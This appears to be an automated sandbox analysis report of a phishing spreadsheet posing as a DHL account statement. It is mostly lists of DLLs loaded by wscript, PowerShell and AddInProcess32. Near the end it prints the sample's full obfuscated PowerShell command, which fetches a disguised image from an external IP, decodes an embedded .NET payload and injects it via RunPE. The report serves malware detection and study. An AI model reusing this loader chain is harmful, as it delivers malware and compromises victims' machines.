                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dll
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: RunPE.pdb source: powershell.exe, 00000006.00000002.520915129.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.515833395.00000000001F0000.00000004.08000000.00040000.00000000.sdmp
                  Source: DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsxInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Source: 6.2.powershell.exe.2b86934.1.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: 6.2.powershell.exe.1f0000.0.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: 6.2.powershell.exe.62d7bb0.3.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll)
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object 